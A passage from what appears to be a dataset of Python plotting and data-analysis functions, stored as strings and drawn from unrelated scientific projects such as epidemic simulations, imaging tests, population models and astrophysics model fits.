self.infected.append(len(infected_x))\n self.deaths.append(len(dead_x))\n self.infected_total.append(self.putil.size - len(healthy_x))\n self.immunes.append(len(immune_x))\n self.frames.append(0)\n\n # Line graph plotting number\n self.total_infected, = self.ax1.plot(self.frames, self.infected_total)\n self.currently_infected, = self.ax1.plot(self.frames, self.infected, c=\"indianred\", label='Currently Infected')\n self.total_deaths, = self.ax1.plot(self.frames, self.deaths, c=\"indigo\", label='Total Dead')\n self.total_immune, = self.ax1.plot(self.frames, self.immunes, c=\"mediumseagreen\", label='Total Immune')\n\n # Code below prints statistics \n if(self.putil.enforce_social_distance_at > 0):\n self.ax1.plot([self.putil.enforce_social_distance_at]*2, [0,self.putil.size],c=\"gold\", label=\"Social Distancing\")\n self.social_distancing_info = (\"At frame \" + str(self.putil.enforce_social_distance_at))\n self.social_distancing_num = str(int(self.putil.social_distance_per * self.putil.size)) + \" or \" + str(self.putil.social_distance_per*100)+\"%\"\n else:\n self.social_distancing_info = (\"Disabled\")\n self.social_distancing_num = \"0 or 0%\"\n\n if(self.putil.enforce_mask_wearing_at > 0):\n self.ax1.plot([self.putil.enforce_mask_wearing_at]*2, [0,self.putil.size],c=\"hotpink\", label=\"Mask Mandate\")\n self.mask_wearing_info = \"At frame \" + str(self.putil.enforce_mask_wearing_at) \n else:\n self.mask_wearing_info = \"Disabled\"\n\n self.ax1.tick_params(axis=\"y\",direction=\"in\", pad=3)\n self.ax1.plot([0,1000],[self.putil.virus.total_healthcare_capacity]*2, c=\"silver\")\n self.ax1.get_xaxis().set_visible(False)\n self.ax1.legend(prop={'size': 8},loc='upper right')\n self.ax2.text(0,1,\"Statistics\", fontsize='large' , fontweight='bold')\n self.ax2.text(0,-0.5, \"Frame:\\nCurrently Infected:\\nHealthy People:\\nImmune People:\\nTotal Deaths:\\nHealthcare Conditions:\")\n self.ax2.text(0.54,-0.5, \"Population:\\nMasks Wearing:\\nSocial Distancing:\\nPeople Distancing:\\nTotal Infected:\\n\")\n self.ax.text(0,1.06, \"Simulation\", fontsize='xx-large' , fontweight='bold')\n self.text = self.ax2.text(0.33, -0.5, \"%i \\n%i \\n%s \\n%s \\n%s \\n%s\" %(0,len(infected_x),str(len(healthy_x)) + \" or 0%\", str(len(immune_x)) + \" or 0%\",str(len(dead_x)) + \" or 0%\",self.healthcare_status))\n self.text2 = self.ax2.text(0.81,-0.5,\"%d \\n%s \\n%s \\n%s \\n%s\\n\" % (self.putil.size, self.mask_wearing_info, self.social_distancing_info, self.social_distancing_num , total_infected))\n\n return self.scat, self.scat2, self.scat3, self.scat4, self.currently_infected, self.total_infected,", "def vaccination_population_plot(r_zero,\n data_file_name='vaccination_data_solution2020-06-16.pkl',\n fig_file_name='model_solution.pdf'):\n df = pd.read_pickle(data_file_name)\n fig, ((ax_s, ax_e, ax_cl), (ax_i_s, ax_i_a, ax_r), (ax_d, ax_v, ax_t)) = plt.subplots(nrows=3, ncols=3)\n #\n n_whole = 1.0 # without rescaling population\n t = df['time']\n ax_s = plt.subplot(331)\n ax_s.plot(t, n_whole * df['s'], label=\"s\")\n ax_s.legend(loc=0)\n #\n ax_e = plt.subplot(332)\n ax_e.plot(t, n_whole * df['e'], label=\"e\")\n ax_e.legend(loc=0)\n #\n cl = n_whole * (df['s'] + df['e'] + df['i_s'] +\n df['i_a'] + df['r'] + df['d'] +\n df['v'] + df['treat'])\n #\n ax_cl = plt.subplot(333)\n ax_cl.plot(t, cl, label=\"cl\")\n ax_cl.legend(loc=0)\n #\n ax_i_s = plt.subplot(334)\n ax_i_s.plot(t, n_whole * df['i_s'], label=\"i_s\")\n ax_i_s.legend(loc=0)\n #\n ax_i_a = plt.subplot(335)\n ax_i_a.plot(t, n_whole * df['i_a'], label=\"i_a\")\n ax_i_a.legend(loc=0)\n #\n ax_r = plt.subplot(336)\n ax_r.plot(t, n_whole * df['r'], label=\"r\")\n ax_r.legend(loc=0)\n #\n ax_d = plt.subplot(337)\n ax_d.plot(t, n_whole * df['d'], label=\"d\")\n ax_d.legend(loc=0)\n #\n ax_v = plt.subplot(338)\n ax_v.plot(t, n_whole * df['v'], label=\"v\")\n ax_v.legend(loc=0)\n #\n ax_t = plt.subplot(339)\n ax_t.plot(t, n_whole * df['treat'], label=\"treat\")\n ax_t.legend(loc=0)\n #\n plt.tight_layout()\n fig.suptitle(\"R0: \" + str(r_zero))\n plt.savefig(fig_file_name)\n plt.show()\n return", "def plot_for_pop(exp,correctp,data_crop,IV,DV,bins,xticklabels,xlabel,ylabel,robust=0):\n \n\n \n if not os.path.exists('plots'):\n os.makedirs('plots')\n \n if exp == 'POP1':\n logLossmedian=1.386294\n colors = [\"orangered\", \"silver\"]\n else:\n logLossmedian=1.098612\n colors = [\"steelblue\", \"silver\"]\n \n customPalette = sns.set_palette(sns.color_palette(colors))\n plt.rc('font', size=15) \n \n if IV=='Final.balance':\n correctp.loc[correctp['logLoss.streak'] == 0]\n if IV=='logLoss.streak':\n correctp.loc[correctp['Final.balance'] == 0]\n if IV == 'logResult':\n correctp.loc[correctp['Final.balance'] == 0]\n\n # Predicted\n IV_p=correctp.groupby(['group',IV]).mean().loc[:,'predicted']\n IV_p=IV_p.unstack(level=0)\n IV_p=pd.DataFrame(IV_p)\n if exp == 'POP1':\n #IV_p.reset_index(inplace=True)\n IV_p=IV_p.loc[:,['Voucher predicted','Cash predicted']]\n print(IV_p)\n # Raw Data\n # Create arbitrary bins and check N in each\n data_crop.loc[:,'IV.binned']=pd.cut(data_crop.loc[:,IV], \n bins=bins)\n IV_nbins=pd.cut(data_crop.loc[:,IV], \n bins=bins).value_counts()\n IV_data=data_crop.groupby(['Participant','IV.binned','group']).mean().loc[:,DV]\n IV_data=pd.DataFrame(IV_data)\n\n IV_data = IV_data.stack(level=0).reset_index(level=0) \\\n .reset_index().drop('level_2',axis=1) \\\n .rename(columns={0:'DV'})\n print(IV_nbins)\n IV_nbins.to_csv('plots/'+IV+'binN.csv',header=False )\n # Build figure\n fig, (ax1, ax2) = plt.subplots(1,2,figsize=(8,4),sharey=True)\n #boxplot ax1\n if exp=='POP1':\n sns.boxplot(y='DV', x='IV.binned',data=IV_data,hue='group',\n ax=ax1,palette=customPalette,linewidth=1,fliersize=5, hue_order=['Voucher data','Cash data'])\n else:\n sns.boxplot(y='DV', x='IV.binned',data=IV_data,hue='group',\n ax=ax1,palette=customPalette,linewidth=1,fliersize=5)\n if IV == 'Trial.type.binary':\n IV_p.plot.bar(ax=ax2)\n ax1.xaxis.set_ticklabels(['Win','Loss'])\n ax2.xaxis.set_ticklabels(['Win','Loss'],rotation=0)\n else:\n IV_p.plot(ax=ax2)\n ax1.set_ylabel(ylabel)\n ax2.set_ylabel(ylabel)\n ax1.set_xlabel(xlabel)\n ax2.set_xlabel(xlabel)\n fig.legend(title=None,loc=1,frameon=False)\n ax1.legend().set_visible(False)\n ax2.legend().set_visible(False)\n if DV == 'logISI':\n ax1.set_ylim(bottom=5,top=9.5)\n # Change yaxis labels for boxplot - use minor ticks to define edges and turn off major\n xbins=[]\n for i in np.arange(-0.5, 100,1):\n xbins.append(i)\n if len(xbins)==len(xticklabels):\n break\n if IV != 'Trial.type.binary':\n ax1.xaxis.set_ticks(xbins,minor=True)\n ax1.xaxis.set_ticklabels(xticklabels,minor=True)\n ax1.xaxis.set_ticks([])\n ax1.xaxis.set_tick_params(which='minor',length=4)\n sns.despine(top=True,right=True)\n plt.tight_layout()\n if robust==1:\n fig.savefig(fname='plots/robust_'+IV +'.png',format='png',transparent=True)\n fig.savefig(fname='plots/robust_'+IV + '.eps',format='eps',transparent=True)\n else:\n fig.savefig(fname='plots/'+IV +'.png',format='png',transparent=True)\n fig.savefig(fname='plots/'+IV + '.eps',format='eps',transparent=True)", "def plot_ave_profile(f,y):\n favex = np.mean(f, axis=1) # Horizontal average\n\n # Plot\n fig, ax = plt.subplots(1,1, figsize=(15,9))\n ax.plot(favex, y)\n\n # Label\n ax.set_xlabel(r'$\\overline{T}$')\n ax.set_ylabel(r'$y$')\n fig.tight_layout()\n\n # Save\n fig.savefig('Tave.pdf')\n \n plt.show()", "def p_plot(data,pv_index=0,alpha=0.05):\n ####if it's a pd.dataframe, rename to col header\n if isinstance(data, pd.DataFrame):\n if isinstance(pv_index, int):\n pv_index = data.columns.get_values()[pv_index]\n data =data.rename(columns ={pv_index: \"p_value\"})\n if not (np.issubdtype(data['p_value'].dtypes, np.number)):\n raise TypeError(\"Please ensure you have specified the column index of numeric p-values.\")\n ###or make a vector a pd.dataframe\n else:\n data = pd.DataFrame({\"p_value\": data})\n \n if (data[\"p_value\"].max()> 1) or (data[\"p_value\"].max()< 0):\n raise ProbabilityError(\"One or more p-values is not between 0 and 1!\")\n \n m = len(data['p_value'])\n\n data = data.sort_values('p_value',ascending=True)\n data['rank'] = np.arange(1,len(data['p_value'])+1)\n data['critical_value'] = data['rank']*alpha/m\n\n fig = plt.clf()\n plt.scatter(data['rank'],data['p_value'],color='black')\n plt.axhline(y=alpha,label='Bonferroni')\n plt.plot(data['rank'],data['critical_value'],label='BH',color='red')\n plt.legend()\n plt.title(\"Bonferroni vs BH\")\n plt.xlabel(\"Rank\")\n plt.ylabel(\"p(k)\")\n return fig", "def main(logy):\n filep = sys.stdin\n dataf = pd.read_csv(filep, sep=\" \", index_col=0, header=None)\n dataf.plot(logy=logy)\n print(dataf)\n plt.savefig(\"scaling.pdf\")", "def show_results(self):\n\n N = split_list(self.N)\n # create subplot\n fig = make_subplots(rows=1,cols=2,\n subplot_titles=('Fish population', 'Harvested fish'),\n specs=[[{'type': 'xy'}, {'type': 'pie'}]])\n #Add population line graph\n fig.add_trace(go.Scatter(y=N['odds'], x=np.linspace(1, 11, 6), name='odd year population',\n hovertemplate =\n 'Year: %{x}'+ '<br>Pop: %{y}'),\n row=1, col=1)\n fig.add_trace(go.Scatter(y=N['evens'], x=np.linspace(2, 12, 6), name='even year population',\n hovertemplate =\n 'Year: %{x}'+ '<br>Pop: %{y}'),\n row=1, col=1)\n fig.update_xaxes(title_text=\"year\", row=1, col=1)\n fig.update_yaxes(title_text=\"population\", row=1, col=1)\n\n # cannot use 'paper' as yref due to bug in sublplot.\n fig.add_shape(type='line',\n xref='x', yref='y',\n x0=2.5, y0=-10, x1=2.5, y1=1000,\n line=dict(color='Black', width=3),\n row=1, col=1)\n\n # create pie chart\n colors = ['#636EFA', '#EF553B'] \n labels = ['total odd year harvest', 'total even year harvest']\n M = split_list(self.harvest_record)\n values = [sum(M['odds']), sum(M['evens'])]\n fig.add_trace(go.Pie(labels=labels, values=values, hoverinfo='label', textinfo='value', marker=dict(colors=colors)), \n row=1, col=2)\n\n # add title\n fig.update_layout(title_text='Results') \n fig.write_html(\"fish_trap_simulation.html\")\n\n \n return fig", "def plot_spatial_res(data_obj, test_num):\n\n #---------------------------------------------------------------------------------------------#\n # Go through each file [image] and plot the spatial resolution ROI images and MTF data graphs #\n #---------------------------------------------------------------------------------------------#\n for i in range(len(data_obj.files)):\n\n fig = new_pdf_page(data_obj.pdf_obj) #Create a new pdf page\n plt.axis('off')\n\n # Create and plot the (centered) title of the page - that also states the MTF20 values\n str1 = 'Test ' + str(test_num) + ': Spatial Resolution \\n' + \\\n 'MTF20x = ' + \"{0:.2f}\".format(data_obj.MTF_data.MTF20_x) + \\\n '\\n MTF20y = ' + \"{0:.2f}\".format(data_obj.MTF_data.MTF20_y)\n plt.suptitle(str1)\n\n #-----------------------------------------------#\n # Plot the main image in the middle of the page #\n #-----------------------------------------------#\n ax1 = fig.add_subplot(312)\n plt.imshow(data_obj.img_data[i].lead_foil_ROI.img) #Display the ROI image of the lead foil\n\n # Display the title of the ROI image - the orientation\n plt.title('Orientation ' + str(data_obj.img_data[i].orientation))\n plt.xticks([]) # labels\n plt.yticks([])\n ax = plt.gca()\n ax.xaxis.set_ticks_position('none') # tick markers\n ax.yaxis.set_ticks_position('none')\n\n if data_obj.img_data[i].orientation % 2 == 1:\n plt.xlabel('x axis')\n plt.ylabel('y axis')\n else:\n plt.xlabel('y axis')\n plt.ylabel('x axis')\n\n #-----------------------------#\n # Display the Horizontal plot #\n #-----------------------------#\n ax2 = fig.add_subplot(325)\n plt.ylabel('MTFx')\n plt.xlabel('Spatial frequency (cycles/mm)')\n plt.plot(data_obj.img_data[i].MTF_obj.MTF_x_f, data_obj.img_data[i].MTF_obj.MTF_x)\n text = 'MTF20x = ' + \"{0:.2f}\".format(data_obj.img_data[i].MTF_obj.MTF20_x)\n\n ax2.annotate(text,\n xy=(data_obj.img_data[i].MTF_obj.MTF20_x, 0.2),\n xytext=(np.max(data_obj.img_data[i].MTF_obj.MTF_x_f), 0.7),\n arrowprops=dict(facecolor='black', shrink=0.05, width=0.5, headwidth=4),\n horizontalalignment='right')\n\n #---------------#\n # Vertical plot #\n #---------------#\n ax3 = fig.add_subplot(326)\n plt.ylabel('MTFy')\n plt.xlabel('Spatial frequency (cycles/mm)')\n plt.plot(data_obj.img_data[i].MTF_obj.MTF_y_f, data_obj.img_data[i].MTF_obj.MTF_y)\n text = 'MTF20y = ' + \"{0:.2f}\".format(data_obj.img_data[i].MTF_obj.MTF20_y)\n\n ax3.annotate(text,\n xy=(data_obj.img_data[i].MTF_obj.MTF20_y, 0.2),\n xytext=(np.max(data_obj.img_data[i].MTF_obj.MTF_y_f), 0.7),\n arrowprops=dict(facecolor='black', shrink=0.05, width=0.5, headwidth=4),\n horizontalalignment='right')", "def plot(self, dtables, figs, **kwargs):\n self.safe_update(**kwargs)\n sumtable = dtables['biasoscorr_stats']\n figs.plot_stat_color('mean-s', sumtable['s_correl_mean'].reshape(9, 16))\n figs.plot_stat_color('mean-p', sumtable['p_correl_mean'].reshape(9, 16))", "def dofigure5():\n required = {'Plastocyanin (Phormidium)':[61,92],\n 'Plastocyanin (Anabaena variabilis)':[62,92],\n 'Bovine Beta-Lactoglobulin':[64,114]}\n \n for p in DB.getRecs():\n prot = DB[p]['name']\n if prot in required:\n Eh = data=DB[p]['1H NMR']\n En = data=DB[p]['15N NMR']\n for d in Eh.datasets:\n hdata = Eh.getDataset(d)\n num = int(t.getResidueFields(hdata)['res_num'])\n #print d, type(num), required[prot]\n if num in required[prot]:\n print num\n ndata = En.getDataset(d)\n Eh.plotDatasets(d, filename=d+'.png')\n return", "def analyse():\n health = db.execute(\"SELECT * FROM health WHERE user_ID = :id\", id=session[\"user_id\"])\n phone = db.execute(\"SELECT * FROM usage WHERE user_ID = :id\", id=session[\"user_id\"])\n hdata, pdata = []\n # get relevant values for health data then put values into two array\n for i in range(3):\n health1 = [health[i][h] for h in health[i]]\n hdata.append(health1[2:6])\n hdata = np.array(hdata)\n hdata[[0, 2]] = hdata[[2, 0]]\n print(np.mean(hdata, axis = 0))\n print(np.std(hdata, axis = 0))\n print(np.median(hdata, axis = 0))\n\n # get relevant values for phone data then put values into 2D array\n for i in range(3):\n phone1 = [phone[i][h] for h in phone[i]]\n pdata.append(phone1[2:7] + phone1[9:14])\n pdata = np.array(pdata)\n red = pdata[...,2]\n dep = []\n print(red)\n for i in hdata[...,0]:\n dep.append(int(i))\n dep = np.array(dep)\n print(dep)\n # pearson\n print (np.corrcoef(red, dep ))\n\n\n\n return render_template(\"stats.html\",)", "def show_stats(self):\n if len(self.keypoints) == 0:\n logger.warning(\"No keypoints yet: running process before display\")\n self.process()\n import pylab\n f = pylab.figure()\n ax = f.add_subplot(1, 1, 1)\n ax.plot(self.keypoints.sigma, self.keypoints.I, '.r')\n ax.set_xlabel(\"Sigma\")\n ax.set_ylabel(\"Intensity\")\n ax.set_title(\"Peak repartition\")\n f.show()", "def plot_precision_figure(self):\n\n data_analysis = DatabaseData(dataframe=self.plot_data)\n prop_data, energy_data, M, C, pred_energy, pred_property = \\\n data_analysis.create_precision_bokeh_compat(self.prop_data, self.energy_data, properties=self.properties)\n p = figure(plot_height=400, plot_width=400,tools=\"pan,wheel_zoom,box_zoom,reset,previewsave\",\\\n x_axis_type=\"log\", y_axis_type=\"log\", x_axis_label='Energy Convergence (meV/atom)', title='Slope M is {0}'.format(str(M)) )\n p.line(pred_energy, pred_property, color='red')\n p.circle(self.energy_data, self.prop_data, color='blue',size=5, line_alpha=0)\n #p.multi_line(xs_err, ys_err, color='black')\n if self.properties == 'B':\n p.yaxis.axis_label = 'Bulk Modulus B (%)'\n elif self.properties == 'dB':\n p.yaxis.axis_label = 'Bulk Modulus Pressure Derivative (%)'\n elif self.properties == 'Multiple':\n p.yaxis.axis_label = \"V0, B, B' (%)\"\n elif self.properties == 'V0':\n p.yaxis.axis_label = 'Volume (%)'\n\n return p", "def gen_plots(uf_dict, f_dict, min_x, max_x, min_y, max_y, axes, name, histogram, total):\n with PdfPages(name) as pdf:\n total_xuf = []\n total_yuf = []\n total_xf = []\n total_yf = []\n for entry in uf_dict:\n print 'Making plot for ' + entry\n xuf, yuf = zip(*uf_dict[entry])\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.scatter(xuf, yuf, c='#ad4851', marker='o', label='initial structures')\n try:\n xf, yf = zip(*f_dict[entry])\n ax1.scatter(xf, yf, c='orange', marker='x', label='selected structures')\n except ValueError:\n xf = []\n yf = []\n plt.legend(loc='upper right')\n plt.title(entry, fontsize=30)\n plt.xlim(min_x, max_x)\n plt.ylim(min_y, max_y)\n plt.xlabel(axes[0], fontsize=20)\n plt.ylabel(axes[1], fontsize=20)\n pdf.savefig(fig)\n plt.close()\n\n if total:\n total_xuf.extend(xuf)\n total_yuf.extend(yuf)\n total_xf.extend(xf)\n total_yf.extend(yf)\n\n if histogram:\n bins = np.linspace(min_y, max_y, num=10)\n plt.hist(yuf, bins, alpha=0.5, color='b', label='initial structures')\n try:\n plt.hist(yf, bins, alpha=0.5, color='orange', label='selected structures')\n except ValueError:\n pass\n plt.legend(loc='upper right')\n plt.title(entry, fontsize=30)\n plt.xlabel(axes[1], fontsize=20)\n plt.ylabel('Frequency', fontsize=20)\n pdf.savefig()\n plt.close()\n\n if total:\n print 'Making composite plot'\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.scatter(total_xuf, total_yuf, c='#ad4851', marker='o', label='initial structures')\n ax1.scatter(total_xf, total_yf, c='orange', marker='x', label='selected structures')\n plt.legend(loc='upper right')\n plt.title('Composite Plot', fontsize=30)\n plt.xlim(min_x, max_x)\n plt.ylim(min_y, max_y)\n plt.xlabel(axes[0], fontsize=20)\n plt.ylabel(axes[1], fontsize=20)\n pdf.savefig(fig)\n plt.close()", "def plot(self,experiment_id = None,image_path = None):\n c = self.cursor()\n where_experiment_id = ''\n if not experiment_id is None:\n if isinstance(experiment_id, list):\n exp_ids = ','.join([ str(f) for f in experiment_id ])\n where_experiment_id = ' WHERE id in ({})'.format(exp_ids)\n else:\n where_experiment_id = ' WHERE id = {}'.format(experiment_id)\n c.execute(\n 'SELECT exp_id,exp_name,exp_description,var_name FROM experiment'\n + where_experiment_id\n )\n experiments = c.fetchall()\n exp_count = len(experiments)\n fig, axs = plt.subplots(exp_count)\n if exp_count == 1:\n axs = [axs]\n trend = lambda a,b: np.poly1d(np.polyfit(a, b, 1))(a)\n for i in range(exp_count):\n axs[i].set_title(experiments[i]['exp_name'])\n axs[i].set_xlabel(experiments[i]['exp_description'])\n # build x-axis \n x_axis = []\n c.execute(\n '''\n SELECT val FROM fact\n WHERE var_name = ?\n AND exp_id = ?\n ORDER BY step_id ASC\n ''',\n (\n experiments[i]['var_name'],\n experiments[i]['exp_id']\n )\n )\n x_axis = [r['val'] for r in c.fetchall()]\n c.execute(\n '''\n SELECT DISTINCT var_name FROM fact \n WHERE exp_id = ? AND var_name != ?\n ORDER BY var_name ASC\n ''',\n (experiments[i]['exp_id'],experiments[i]['var_name'])\n )\n variables = [r['var_name'] for r in c.fetchall()]\n for variable in variables:\n c.execute(\n '''\n SELECT val FROM fact\n WHERE exp_id = ? AND var_name = ?\n ORDER BY step_id ASC \n ''',\n (experiments[i]['exp_id'], variable)\n )\n y_axis = [r['val'] for r in c.fetchall()]\n axs[i].scatter(x_axis, y_axis)\n axs[i].plot(x_axis,trend(x_axis, y_axis),label=variable)\n axs[i].legend()\n fig.tight_layout()\n # save into image on headless machine\n if not image_path is None:\n plt.savefig(image_path)\n else:\n try:\n plt.show()\n except:\n plt.savefig(\"plot.png\") \n self.commit()", "def plot_data(df, title=\"normalized Stock prices\", ylabel=\"Price\", xlabel=\"Date\" ):\n plt.clf()\n ax = df.plot(title=title, fontsize=12)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n plt.savefig('files/output/'+title+'.png')", "def plotting(dataframe, prod_num):\n fig, axs = plt.subplots(2, sharex=True)\n axs[0].plot(dataframe['STU'])\n axs[1].plot(dataframe['STU'].diff().dropna())\n axs[0].set_title(\"Time Series of Product\" + f\"_{prod_num}\")\n axs[1].set_title(\"Differenced Time Series of Product\" + f\"_{prod_num}\")\n plt.savefig(\"Time Series of Product\" + f\"_{prod_num}\" + \".pdf\")", "def plot(plot_count, density_map, padding, name):\n density_map = density_map[padding:-1 - padding, padding:-1 - padding]\n print(\"max density = %g\" % (np.amax(density_map)))\n print(\"mean density = %g\" % (np.mean(density_map)))\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n x = np.arange(density_map.shape[0])\n y = np.arange(density_map.shape[1])\n\n x, y = np.meshgrid(x, y)\n ax.plot_surface(x, y, density_map, alpha=0.8)\n\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('density')\n\n #plt.tight_layout()\n plt.savefig(name + \".3d.%d.png\" % (plot_count))\n plt.close()\n\n #plt.clf()\n\n #fig, ax = plt.subplots()\n\n #ax.pcolor(density_map)\n\n ## Loop over data dimensions and create text annotations.\n ##for i in range(density_map.shape[0]):\n ## for j in range(density_map.shape[1]):\n ## text = ax.text(j, i, density_map[i, j],\n ## ha=\"center\", va=\"center\", color=\"w\")\n #fig.tight_layout()\n #plt.savefig(name+\".2d.%d.png\" % (plot_count))\n #plt.close()", "def generate_results(self, test_no, test_dict):\n g_s = gridspec.GridSpec(4, 2, wspace=0.2, hspace=1.5)\n fig = plt.figure(figsize=(20, 6))\n fig.suptitle('Experiment Results', y=0.93)\n\n x_val = np.arange(1, self.iters+1)\n\n ax1 = plt.subplot(g_s[0:3, :1], label = 'Mean Rewards')\n ax1.set_title('Mean Rewards')\n ax1.scatter(x_val, self.mean_rewards, s=5)\n ax1.set(xlabel='Iteration', ylabel='Mean Reward')\n\n ax2 = plt.subplot(g_s[0:3, 1:])\n ax2.scatter(x_val, self.sub_goals, s=5, label='Sub-optimal Goal')\n ax2.scatter(x_val, self.opt_goals, s=5, label='Optimal Goal')\n ax2.set_title('Goal Success Percentage by Type')\n ax2.set(xlabel='Iteration', ylabel='Success Percentage (%)')\n ax2.legend(loc=0)\n\n cells = list(test_dict.values())\n cells = [str(i) for i in cells]\n columns = list(test_dict.keys())\n ax3 = plt.subplot(g_s[3:, :])\n ax3.axis('off')\n ax3.table(cellText=[cells], colLabels=columns, loc='center', cellLoc='center')\n\n plt.savefig(f'results/charts/Test_{test_no}.png', bbox_inches='tight')", "def plot_collective(xdict, ydict, xprop, yprop, documents):\n x_ion = {\"Mg\": [], \"Ca\": [], \"Zn\": [], \"Li\": [], \"Na\": []}\n y_ion = {\"Mg\": [], \"Ca\": [], \"Zn\": [], \"Li\": [], \"Na\": []}\n for item in documents:\n if item[\"path_id\"][-3:] == \"001\":\n x_ion[item[\"cation_type\"]].append(xdict[item[\"path_id\"]])\n y_ion[item[\"cation_type\"]].append(ydict[item[\"path_id\"]])\n fig = plt.figure(figsize=(6,6), dpi=plotting_dpi)\n ax = fig.add_subplot(111)\n for ion in [\"Mg\", \"Ca\", \"Zn\", \"Li\", \"Na\"]:\n ax.scatter(x_ion[ion], y_ion[ion], s=70, zorder=2, color=color_dict[ion], linewidths=2.5, edgecolors='black',\n label=ion)\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n \n # # Plot lines for fitting, if useful\n # x2 = np.arange(-700, 3300, 1)\n # ax.plot(x2, x2)\n \n # # For setting axis boundaries\n # ax.set_xlim([-700, 3500])\n # ax.set_ylim([0,100])\n \n # Plot display settings\n ax.set_xlabel(xlabel, fontsize=24)\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size':10})\n # plt.legend(loc='best')\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.show()", "def plotObsExpSigEnrichment(f):\n mat = pd.read_csv(f, sep=\"\\t\", index_col=0)\n fig, ax = pylab.subplots()\n ax.plot(mat.index,\n mat[\"observed\"] * 100,\n color=colors[0],\n label=\"observed\")\n ax.plot(mat.index,\n mat[\"expected\"] * 100,\n color=colors[1],\n label=\"expected\")\n ax.set_xlabel(\"Percentage of Bins\")\n ax.set_ylabel(\"Percetange of PETs\")\n ax.legend(loc=\"upper left\")\n #ax2 = ax.twinx()\n #ax2.plot( mat.index, mat[\"Obs/Exp\"],color=colors[2],label=\"Obs/Exp\")\n #ax2.set_ylabel(\"Obs/Exp\")\n #for t in ax2.get_yticklabels():\n # t.set_color(colors[2])\n pylab.savefig(\"%s.pdf\" % (f.replace(\".txt\", \"\")))", "def plot_modelparametercollections(plotname, parametercollection_SF, parametercollection_AGN,\n stat_SF, stat_AGN, AGNcol='blue',SFcol='red', constraintsstr=None,\n fluxratiodictionarylist=None, verbose=True):\n\n Nobj = len(parametercollection_SF)\n if verbose: print(' - Will generate plots of NEOGAL \"PDFs\" for all '+str(Nobj)+' objects in parameter collections')\n for oo in np.arange(Nobj):\n objid = parametercollection_SF[oo]['id']\n if verbose:\n infostr = ' plotting info for '+str(objid)+' ('+str(\"%.5d\" % (oo+1))+' / '+str(\"%.5d\" % Nobj)+') '\n sys.stdout.write(\"%s\\r\" % infostr)\n sys.stdout.flush()\n plotname_obj = plotname.replace('.pdf','_id'+str(objid)+'.pdf')\n # if verbose: print(' - Generating the figure '+plotname_obj)\n figuresize_x = 6\n figuresize_y = 5\n fig = plt.figure(figsize=(figuresize_x,figuresize_y))\n Fsize = 9\n LW = 2\n plt.rc('text', usetex=True) # enabling LaTex rendering of text\n plt.rc('font', family='serif',size=Fsize) # setting text font\n plt.rc('xtick', labelsize=Fsize)\n plt.rc('ytick', labelsize=Fsize)\n plt.clf()\n plt.ioff()\n\n left = 0.10 # the left side of the subplots of the figure\n right = 0.95 # the right side of the subplots of the figure\n bottom = 0.10 # the bottom of the subplots of the figure\n top = 0.90 # the top of the subplots of the figure\n wspace = 1.50 # the amount of width reserved for blank space between subplots\n hspace = 0.50 # the amount of height reserved for white space between subplots\n plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top, wspace=wspace, hspace=hspace)\n\n Nrows, Ncols = 3, 6\n ylabel = 'Number of NEOGAL SF ('+str(SFcol)+') and AGN ('+str(AGNcol)+') models'\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n Nmodels_SF = float(len(parametercollection_SF[oo]['Zgas']))\n Nmodels_AGN = float(len(parametercollection_AGN[oo]['Zgas']))\n\n titlestr = 'Models satisfying ID='+str(objid)+' cuts: SF='+str(Nmodels_SF)+'; AGN='+str(Nmodels_AGN)\n if (Nmodels_AGN > 0) & (Nmodels_SF > 0):\n Nmodels_ratio = Nmodels_SF/Nmodels_AGN\n titlestr_addition = '; SF/AGN='+str(\"%.4f\" % Nmodels_ratio)\n titlestr = titlestr+titlestr_addition\n\n if fluxratiodictionarylist is not None:\n constraints = fluxratiodictionarylist[oo]\n constraintslist = [key+':['+str(\"%.2f\" % constraints[key][0])+','+str(\"%.2f\" % constraints[key][1])+']'\n for key in constraints.keys() if key not in ['id']]\n\n if len(constraintslist) < 4:\n constraintsstr = '; '.join(constraintslist)\n elif (len(constraintslist) > 3) & (len(constraintslist) < 7):\n constraintsstr = '; '.join(constraintslist[:3])+'\\n'+'; '.join(constraintslist[3:6])\n elif (len(constraintslist) > 6) & (len(constraintslist) < 10):\n constraintsstr = '; '.join(constraintslist[:3])+'\\n'+'; '.join(constraintslist[3:6])+\\\n '\\n'+'; '.join(constraintslist[6:])\n else:\n constraintsstr = '; '.join(constraintslist[:3])+'\\n'+'; '.join(constraintslist[3:6])+\\\n '\\n'+'; '.join(constraintslist[6:9])+'\\n'+'; '.join(constraintslist[9:])\n\n constraintsstr = constraintsstr.replace('10000000000.00','1e10')\n\n titlestr = titlestr+'\\n'+constraintsstr\n # titlestr = r'{\\fontsize{'+str(Fsize)+'pt}{3em}\\selectfont{}{'+titlestr+'\\r}{\\fontsize{'+str((Fsize-2.))+'pt}{3em}\\selectfont{}('+constraintsstr+'}'\n\n # plt.text(x=0.5, y=0.94, s=titlestr, fontsize=Fsize, ha=\"center\", transform=fig.transFigure)\n # plt.text(x=0.5, y=0.88, s=constraintsstr, fontsize=Fsize-2, ha=\"center\", transform=fig.transFigure)\n # fig.title(titlestr,fontsize=Fsize)\n fig.suptitle(titlestr,fontsize=Fsize-2)\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # Zgas\n plt.subplot(Nrows, Ncols, (1,3))\n\n bindefs = np.array([0.0001, 0.0002, 0.0005, 0.001, 0.002, 0.004, 0.006, 0.008, 0.014,\n 0.017, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07])-0.00001\n\n plotkey = 'Zgas'\n nm.plot_modelparametercollections_addhist(parametercollection_SF[oo][plotkey],parametercollection_AGN[oo][plotkey],\n 